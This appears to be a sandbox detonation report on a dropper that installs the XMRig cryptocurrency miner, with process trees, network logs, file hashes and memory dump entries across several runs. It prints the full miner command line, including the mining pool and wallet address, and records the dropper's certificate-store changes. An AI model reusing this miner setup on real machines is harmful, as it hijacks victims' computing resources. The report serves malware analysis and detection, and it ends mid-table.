| PID 3916 wrote to memory of 3232 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3916 wrote to memory of 3232 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3232-16-0x000001B7898F0000-0x000001B789910000-memory.dmp
memory/3232-17-0x000001B78B1F0000-0x000001B78B210000-memory.dmp
memory/3232-18-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-19-0x000001B78B210000-0x000001B78B230000-memory.dmp
memory/3232-20-0x000001B78B230000-0x000001B78B250000-memory.dmp
memory/3232-21-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-22-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-25-0x000001B78B230000-0x000001B78B250000-memory.dmp
memory/3232-24-0x000001B78B210000-0x000001B78B230000-memory.dmp
memory/3232-23-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-26-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-27-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-28-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-29-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-30-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-31-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-32-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-33-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-34-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-35-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-36-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-37-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-38-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-39-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-40-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-41-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-42-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-43-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-44-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-45-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-46-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-47-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-48-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-49-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-50-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-51-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-52-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-53-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-54-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-55-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-56-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-57-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-58-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-59-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-60-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-61-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-62-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-63-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-64-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-65-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-66-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-67-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-68-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-69-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-70-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-71-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-72-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-73-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-74-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-75-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-76-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-77-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-78-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-79-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-80-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-81-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-82-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-83-0x00007FF783E70000-0x00007FF784973000-memory.dmp
memory/3232-84-0x00007FF783E70000-0x00007FF784973000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:04
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1936 wrote to memory of 3708 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1936 wrote to memory of 3708 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3708-16-0x00000299544F0000-0x0000029954510000-memory.dmp
memory/3708-17-0x0000029954640000-0x0000029954660000-memory.dmp
memory/3708-18-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-20-0x0000029954660000-0x0000029954680000-memory.dmp
memory/3708-19-0x0000029954680000-0x00000299546A0000-memory.dmp
memory/3708-21-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-22-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-25-0x0000029954660000-0x0000029954680000-memory.dmp
memory/3708-24-0x0000029954680000-0x00000299546A0000-memory.dmp
memory/3708-23-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-26-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-27-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-28-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-29-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-30-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-31-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-32-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-33-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-34-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-35-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-36-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-37-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-38-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-39-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-40-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-41-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-42-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-43-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-44-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-45-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-46-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-47-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-48-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-49-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-50-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-51-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-52-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-53-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-54-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-55-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-56-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-57-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-58-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-59-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-60-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-61-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-62-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-63-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-64-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-65-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-66-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-67-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-68-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-69-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-70-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-71-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-72-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-73-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-74-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-75-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-76-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-77-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-78-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-79-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-80-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-81-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-82-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-83-0x00007FF715590000-0x00007FF716093000-memory.dmp
memory/3708-84-0x00007FF715590000-0x00007FF716093000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:05
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2760 wrote to memory of 3396 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2760 wrote to memory of 3396 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3396-16-0x000001E594A60000-0x000001E594A80000-memory.dmp
memory/3396-17-0x000001E596450000-0x000001E596470000-memory.dmp
memory/3396-18-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-19-0x000001E596470000-0x000001E596490000-memory.dmp
memory/3396-20-0x000001E596490000-0x000001E5964B0000-memory.dmp
memory/3396-21-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-22-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-23-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-25-0x000001E596490000-0x000001E5964B0000-memory.dmp
memory/3396-24-0x000001E596470000-0x000001E596490000-memory.dmp
memory/3396-26-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-27-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
memory/3396-28-0x00007FF7C99B0000-0x00007FF7CA4B3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:06
Platform
win10v2004-20240226-en
Max time kernel
1794s
Max time network
1820s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob data omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob data omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2876 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2876 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2536 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:06
Platform
win10v2004-20240508-en
Max time kernel
1342s
Max time network
1331s
Command Line
Signatures
xmrig
XMRig Miner payload
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob data omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob data omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
